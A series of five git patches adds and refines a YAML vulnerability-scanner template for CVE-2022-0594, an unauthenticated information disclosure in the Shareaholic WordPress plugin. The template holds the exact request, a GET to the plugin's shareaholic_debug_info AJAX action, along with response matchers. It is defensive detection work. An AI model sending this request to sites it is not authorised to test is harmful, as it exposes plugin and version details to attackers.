From 9e1fd3e1afe89a1a6b67d7a64629ff170da0e264 Mon Sep 17 00:00:00 2001
From: atomic <75549184+atomiczsec@users.noreply.github.com>
Date: Fri, 29 Jul 2022 13:40:41 -0400
Subject: [PATCH 1/5] Add files via upload

---
 cves/2022/CVE-2022-0594.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 cves/2022/CVE-2022-0594.yaml

diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml
new file mode 100644
index 0000000000..d329da3ae9
--- /dev/null
+++ b/cves/2022/CVE-2022-0594.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-0594
+info:
+  name: CVE-2022-0594
+  author: atomiczsec
+  severity: low
+  description: Shareaholic < 9.7.6 - Information Disclosure
+  reference:
+    - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1
+  tags: config,exposure
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
+      
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - 'plugin_version'      
\ No newline at end of file

From d52273398f96e4a715c90a61adc127d9475e41ea Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 29 Jul 2022 23:19:03 +0530
Subject: [PATCH 2/5] Update CVE-2022-0594.yaml

---
 cves/2022/CVE-2022-0594.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml
index d329da3ae9..29595daf09 100644
--- a/cves/2022/CVE-2022-0594.yaml
+++ b/cves/2022/CVE-2022-0594.yaml
@@ -11,7 +11,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
-      
+
     matchers-condition: and
     matchers:
       - type: status
@@ -20,4 +20,4 @@ requests:
       - type: word
         part: body
         words:
-          - 'plugin_version'      
\ No newline at end of file
+          - 'plugin_version'      

From e734093963298d0b2112bb89ead73344d14ed4ea Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 29 Jul 2022 23:19:20 +0530
Subject: [PATCH 3/5] Update CVE-2022-0594.yaml

---
 cves/2022/CVE-2022-0594.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml
index 29595daf09..0826f7cef2 100644
--- a/cves/2022/CVE-2022-0594.yaml
+++ b/cves/2022/CVE-2022-0594.yaml
@@ -20,4 +20,4 @@ requests:
       - type: word
         part: body
         words:
-          - 'plugin_version'      
+          - 'plugin_version'

From fcafc95129e939288bd416017ff8b5f8119ebca7 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 29 Jul 2022 23:24:58 +0530
Subject: [PATCH 4/5] Update CVE-2022-0594.yaml

---
 cves/2022/CVE-2022-0594.yaml | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml
index 0826f7cef2..6b20e786d7 100644
--- a/cves/2022/CVE-2022-0594.yaml
+++ b/cves/2022/CVE-2022-0594.yaml
@@ -6,7 +6,11 @@ info:
   description: Shareaholic < 9.7.6 - Information Disclosure
   reference:
     - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1
-  tags: config,exposure
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594
+  metadata:
+    verified: true
+  tags: wordpress,wp,wp-plugin,exposure
+
 requests:
   - method: GET
     path:
@@ -21,3 +25,4 @@ requests:
         part: body
         words:
           - 'plugin_version'
+          - 'shareaholic_server_reachable'

From 08385e9fc0ebd6ffb47c1fc7207ea9debd066de1 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Fri, 29 Jul 2022 23:44:41 +0530
Subject: [PATCH 5/5] Update CVE-2022-0594.yaml

---
 cves/2022/CVE-2022-0594.yaml | 21 +++++++++++++++------
 1 file changed, 15 insertions(+), 6 deletions(-)

diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml
index 6b20e786d7..067283356c 100644
--- a/cves/2022/CVE-2022-0594.yaml
+++ b/cves/2022/CVE-2022-0594.yaml
@@ -1,15 +1,16 @@
 id: CVE-2022-0594
 info:
-  name: CVE-2022-0594
+  name: Shareaholic < 9.7.6 - Information Disclosure
   author: atomiczsec
   severity: low
-  description: Shareaholic < 9.7.6 - Information Disclosure
+  description: The Professional Social Sharing Buttons, Icons & Related Posts WordPress plugin before 9.7.6 does not have proper authorisation check in one of the AJAX action, available to unauthenticated (in v < 9.7.5) and author+ (in v9.7.5) users, allowing them to call it and retrieve various information such as the list of active plugins, various version like PHP, cURL, WP etc.
   reference:
     - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1
+    - https://wordpress.org/plugins/shareaholic/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594
   metadata:
     verified: true
-  tags: wordpress,wp,wp-plugin,exposure
+  tags: cve,cve2022,wordpress,wp,wp-plugin,exposure
 
 requests:
   - method: GET
@@ -18,11 +19,19 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
       - type: word
         part: body
         words:
           - 'plugin_version'
           - 'shareaholic_server_reachable'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200